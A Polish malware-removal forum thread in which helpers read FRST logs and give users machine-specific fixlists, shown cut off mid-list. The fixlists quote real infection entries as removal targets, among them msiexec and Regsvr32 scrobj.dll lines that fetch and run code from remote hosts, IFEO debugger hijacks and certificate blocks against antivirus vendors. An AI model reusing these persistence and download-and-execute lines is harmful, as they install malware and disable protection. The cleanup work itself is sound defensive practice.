Miszel03

OK, w takim razie proszę o nowy zestaw raportów FRST, bo deinstsalacje to duże zmiany w systemie.

Póki co korzystaj z innej przeglądarki, daj mi czas, bo muszę coś wykombinować (ale sprawdź co będzie jeśli przeinstalujesz przeglądarkę). Zobacz na post picasso. OK, najważniejsze, że się tego pozbyłeś. Zagrożenia wykryte przez AdwCleaner daj do kasacji. I napisz mi jak wygląda obecnie sytuacja? Czy oprócz problemów z FireFoxem coś jeszcze wymaga korekty? Z mojego punktu widzenia już wszystko jest OK.

Po za tym o co prosi picasso, ja poproszę mimo Twojego stwierdzenia o wykonaniu wszystkich kroków o potwierdzenie wykonania punktu 1. Wygląda na to, że ani jeden program nie został odinstalowany. Jeśli jest z tym problem zrób to za pomocą Program Install and Uninstall Troubleshooter.

Ten błąd świadczy o braku kompatybilności lub uszkodzeniu bibliotek Visual Studio. Skoro reinstalacja pakietu bibliotek nie przyniosła rezultatów, to drugą opcję możemy wykluczyć. Zastosuj się do Tutorial'a napisanego przez MitycznegoJeża na forum Pclab - KLIK.

System jest zainfekowany infekcją Trojan.SmartSerives blokującą oprogramowanie zabezpieczające. Widoczne są również istotne instalacje adware. 1. Za pomocą Program Install and Uninstall Troubleshooter odinstaluj: Browser-Security. Sugeruję również pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKLM\...\.scr: EAGLESCR => "C:\EAGLE 8.0.1\eagle.exe" "%1" <===== UWAGA HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [cpx] => "C:\Users\Kacper\AppData\Local\ntuserlitelist\cpx\cpx.exe" -starup <===== UWAGA HKLM-x32\...\Run: [svcvmx] => C:\Users\Kacper\AppData\Local\ntuserlitelist\svcvmx\svcvmx.exe [884224 2017-04-21] () C:\Users\Kacper\AppData\Local\ntuserlitelist HKU\S-1-5-21-4043991316-322300738-1598774976-1001\...\Run: [NEFPMCZBZG.exe] => C:\Users\Kacper\AppData\Local\Temp\65-8a05c-481-70c91-cd38301bfb72a\NEFPMCZBZG.exe m_5 L_1 <===== UWAGA HKU\S-1-5-21-4043991316-322300738-1598774976-1001\...\StartupApproved\Run: => "NEFPMCZBZG.exe" GroupPolicy: Ograniczenia <======= UWAGA R2 Dataup; C:\Users\Kacper\AppData\Local\ntuserlitelist\dataup\dataup.exe [77824 2017-01-05] () [Brak podpisu cyfrowego] <==== UWAGA R2 windowsmanagementservice; C:\Users\Kacper\AppData\Local\fdceag\ct.exe [689152 2017-05-17] () [Brak podpisu cyfrowego] <==== UWAGA C:\Users\Kacper\AppData\Local\fdceag S4 NvStreamSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe" [X] S3 niwdk; Brak ImagePath S3 niimaqk; system32\drivers\niimaqk.sys [X] S3 NvStreamKms; \??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [X] U3 uxroqfow; \??\C:\Users\Kacper\AppData\Local\Temp\uxroqfow.sys [X] <==== UWAGA Unlock: HKLM\SYSTEM\ControlSet001\Services\drmkpro64 R5 drmkpro64; EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox. Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj (pod koniec rozwiązywania problemów) rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

To nie jest w cale tak dużo, jak mogłoby się wydawać. Każdy krok zajmie Ci ok. 3-5 minut.

Naprawdę spory bałagan. Podmiana oryginalnych przeglądarek na fałszywe, szkodliwe usługi tworzące szereg infekcji adware, zarażone skróty, ale to nie wszystko i można by było wymieniać jeszcze, że "ho ho". I Ty i Twój kolega, proszę przeczytajcie lekturę jak uniknąć podobnych sytuacji w przyszłości: KLIK. 1. Przez panel sterowania odinstaluj: Fałszywe oprogramowanie zabezpieczające i inne szkodniki: ScreenShot, update_server, VideoDownloadConverter Internet Explorer Toolbar, YAC(Yet Another Cleaner!). Sponsorzy instalacyjni / zbędniki: McAfee Security Scan Plus, Badanie mające na celu poprawę produktów HP DeskJet 2130 series. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: S2 NPASRE; C:\Users\user\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 SNARE; C:\Users\user\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2017-02-06] (Filseclab Corporation Limited) S2 terana; C:\Users\user\AppData\Local\terana\terana.dll [909312 2017-05-31] () [brak podpisu cyfrowego] R2 VideoDownloadConverter_4zService; C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zbarsvc.exe [89448 2016-01-07] (Mindspark) S2 3DM; C:\Users\user\AppData\Local\3DM\Kitty.dll [X] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] S2 BIT; C:\ProgramData\BIT\BIT.dll [X] S2 FirefoxU; "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" [X] S2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [X] S2 Kitty; C:\Users\user\AppData\Local\Kitty\Kitty.dll [X] S2 VNASRE; C:\Users\user\AppData\Local\VNASRE\Snare.dll [X] S2 WinSAPSvc; C:\Users\user\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) S1 iSafeKrnl; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [X] S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] S1 iSafeKrnlR3; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [X] S3 massfilter; system32\DRIVERS\massfilter.sys [X] S3 ZTEusbmdm6k; system32\DRIVERS\ZTEusbmdm6k.sys [X] S3 ZTEusbnet; system32\DRIVERS\ZTEusbnet.sys [X] S3 ZTEusbnmea; system32\DRIVERS\ZTEusbnmea.sys [X] S3 ZTEusbser6k; system32\DRIVERS\ZTEusbser6k.sys [X] HKLM-x32\...\Run: [VideoDownloadConverter EPM Support] => C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zmedint.exe [11624 2016-01-07] (Mindspark) HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-409928750-3168526246-4082151387-1000\...\Run: [background_fault] => C:\Users\user\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) HKU\S-1-5-21-409928750-3168526246-4082151387-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj84NTlXMkExFkY1MkYdNTLSNkF3NWLSNdZXFjFxOWNSNF== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] Task: {60B10252-8078-4CB8-B709-3C01D8F11E67} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () Task: {76081B4A-A89D-4FE8-9C70-258B2F468250} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj84NTlXMkExFkY1MkYdNTLSNkF3NWLSNdZXFjFxOWNSNF== scrobj.dll Task: {B2A4D69A-F4FC-4645-9075-7B61209D5D8B} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1 Task: {E3D3B381-A71B-4C01-AC74-5D29024991CD} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj84NTlXMkExFkY1MkYdNTLSNkF3NWLSNdZXFjFxOWNSNF== scrobj.dll MSCONFIG\startupreg: Plus Internet => C:\Program Files (x86)\Plus Internet\PlusInternetChecker.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493744586&z=304290105b2752ed3e219d3g8z5tcc2m3z7zdw9m0b&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKU\S-1-5-21-409928750-3168526246-4082151387-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493744586&z=304290105b2752ed3e219d3g8z5tcc2m3z7zdw9m0b&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} URLSearchHook: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 - (Brak nazwy) - {93a3111f-4f74-4ed8-895e-d9708497629e} - C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zSrcAs.dll (Mindspark) SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} SearchScopes: HKLM-x32 -> {cf6e4b1c-dbde-457e-9cef-ab8ecac8a5e8} URL = hxxp://int.search.tb.ask.com/search/GGmain.jhtml?p2=^HJ^xdm659^YYA^pl&si=CIa5saKxl8oCFcf7cgodt1MPSQ&ptb=5E9A0CA2-FEAA-4D35-BEDE-8753F18FA633&ind=2016010704&n=7829e1d0&psa=&st=sb&searchfor={searchTerms} SearchScopes: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493744586&z=304290105b2752ed3e219d3g8z5tcc2m3z7zdw9m0b&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948&q={searchTerms} SearchScopes: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 -> {cf6e4b1c-dbde-457e-9cef-ab8ecac8a5e8} URL = hxxp://int.search.tb.ask.com/search/GGmain.jhtml?p2=^HJ^xdm659^YYA^pl&si=CIa5saKxl8oCFcf7cgodt1MPSQ&ptb=5E9A0CA2-FEAA-4D35-BEDE-8753F18FA633&ind=2016010704&n=7829e1d0&psa=&st=sb&searchfor={searchTerms} BHO-x32: Toolbar BHO -> {312f84fb-8970-4fd3-bddb-7012eac4afc9} -> C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zbar.dll [2015-12-11] (Mindspark) BHO-x32: Search Assistant BHO -> {c547c6c2-561b-4169-a2a5-20ba771ca93b} -> C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zSrcAs.dll [2015-12-11] (Mindspark) Toolbar: HKLM-x32 - VideoDownloadConverter - {48586425-6bb7-4f51-8dc6-38c88e3ebb58} - C:\Program Files (x86)\VideoDownloadConverter_4z\bar\2.bin\4zbar.dll [2015-12-11] (Mindspark) Toolbar: HKU\S-1-5-21-409928750-3168526246-4082151387-1000 -> Brak nazwy - {48586425-6BB7-4F51-8DC6-38C88E3EBB58} - Brak pliku ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 ShortcutWithArgument: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1492624412&z=de235e86702e60a52eb4f69g3z5t0odq0o0zez2ecm&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe hxxp://www.ourluckysites.com/?type=sc&ts=1495651307&z=2e24354c1de9eff7a779466g7zft9w8q3w6gfo4t8q&from=che0812&uid=WDCXWD3200BEKT-75PVMT1_WD-WXS1CC1P3948P3948 HKU\S-1-5-21-409928750-3168526246-4082151387-1000\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) DeleteKey: HKCU\Software\Eastness DeleteKey: HKCU\Software\Google\Chrome\Extensions DeleteKey: HKCU\Software\Firefox DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\WOW6432Node\Eastness DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions C:\Program Files (x86)\BiaoJi C:\Program Files (x86)\Eastness C:\Program Files (x86)\Elex-tech C:\Program Files (x86)\Firefox C:\Program Files (x86)\MIO C:\Program Files (x86)\ScreenShot C:\Program Files (x86)\VideoDownloadConverter_4z C:\ProgramData\BIT C:\ProgramData\Software C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\user\AppData\Local\3DM C:\Users\user\AppData\Local\background_fault C:\Users\user\AppData\Local\Firefox C:\Users\user\AppData\Local\NPASRE C:\Users\user\AppData\Local\SNARE C:\Users\user\AppData\Local\terana C:\Users\user\AppData\Local\VNASRE C:\Users\user\AppData\Roaming\go00001.bak C:\Users\user\AppData\Roaming\Firefox C:\Users\user\AppData\Roaming\SPTemp C:\Users\user\AppData\Roaming\WinSAPSvc C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk C:\Users\Public\Documents\report.dat C:\Users\Public\Documents\temp.dat C:\Windows\psgo C:\Windows\SysWOW64\00 C:\Windows\SysWOW64\11 C:\Windows\SysWOW64\33 C:\Windows\SysWOW64\55 C:\Windows\SysWOW64\1111 CMD: netsh advfirewall reset Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Wyłącz COMODO na czas operacji, by nie zablokował zmian. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 3. Kompleksowo wymień profile w przeglądarce Google Chrome oraz Mozilla FireFox. Otwórz Google Chrome następnie: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę > Załóż czysty profil > ponownie wejdź do sekcji Osoby i skasuj wszystkie stare profile. Kliknij klawisz z flagą Windows + R > wklej komendę "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj. Utracisz wszystko z tych przeglądarek, więc ewentualnie możesz wyeksportować zakładki i ważne linki. Ważne, abyś którąś z powyższych przeglądarek ustawił jako domyślną - inaczej nie cofnie się modyfikacja infekcji. 4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). eastness;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Raporty źle wygenerowane, proszę trzymać się sztywno ustawień przez Nas zalecanych. Zobacz: KLIK.

Wcześniej trochę miałem niedyspozycyjność czasową, ale teraz wrzucam ten temat na priorytet, więc szybko się ze wszystkim uporamy, Kolosalny bałagan (jest gorzej niż było wcześniej). Infekcyjne usługi, modyfikacje skrótów LNK i wiele, wiele więcej. Przeglądarki w opłakanym stanie i pomimo wywalenia profili od fałszywek i tak zostaną inne, więc uważam, że wymiana profili będzie słuszna. Oprócz tego infekcja wprowadziła blokady certyfikatów producentów oprogramowania zabezpieczającego. Zapoznaj się: KLIK. Informacji o braków pewnych wymaganych spraw w systemie nie będę ponownie podawał, bo znajdziesz je w moim pierwszym poście w tym temacie. 1. Deinstalacje. Przez panel sterowania odinstaluj programy adware / fałszywe antywirusy: initialsite123 - Uninstall, YAC(Yet Another Cleaner!). Za pomocą narzędzia Program Install and Uninstall Troubleshooter odinstaluj wszystkie cztery pozycje: AlphaGo. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: Task: {7FFF2EF2-C146-4D1C-A628-4D785460AA93} - System32\Tasks\Exif Bestel for Windows 8 => Rundll32.exe "C:\Program Files\Exif Bestel for Windows 8\Exif Bestel for Windows 8.dll",ypTQVww Task: {76C36436-3B21-4573-B63E-D6F250AB84E1} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () C:\Program Files (x86)\MIO ShortcutWithArgument: C:\Users\And\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\And\Desktop\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 ShortcutWithArgument: C:\Users\And\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D ShortcutWithArgument: C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\And\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Program Files (x86)\Hotleaf C:\Users\And\AppData\Roaming\Hotleaf C:\Users\And\AppData\Local\Hotleaf C:\Program Files (x86)\Firefox C:\Users\And\AppData\Roaming\Firefox C:\Users\And\AppData\Local\Firefox HKLM\...\RunOnce: [AND-KOMPUTER] => C:\Windows\Temp\gBAC6.tmp.exe [239104 2017-06-19] () HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) HKLM\ DisallowedCertificates: 